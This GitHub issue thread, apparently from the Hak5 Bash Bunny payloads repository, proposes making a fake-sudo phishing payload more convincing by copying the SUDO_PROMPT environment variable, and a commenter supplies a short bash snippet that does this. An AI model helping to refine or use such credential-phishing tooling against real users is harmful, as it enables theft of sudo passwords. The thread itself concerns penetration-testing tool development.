### ISSUE TITLE
Use SUDO_PROMPT in sudo-phishing.sh

### ISSUE THREAD

**Issue by jhollowe** [hak5/bashbunny-payloads#527]
for payloads/library/phishing/fake-sudo/sudo-phishing.sh, using the `SUDO_PROMPT` environment variable would allow this to be more convincing in environments with customized sudo prompts.

**Comment by TW-D** [comment]
Hello @jhollowe, it's a good idea, I guess this replacement :
```bash
if [ -z "${SUDO_PROMPT}" ]
then
    readonly INPUT_MESSAGE="[sudo] password for ${USER}: "
else
    readonly INPUT_MESSAGE="${SUDO_PROMPT}"
fi
```
would allow this optimization ?
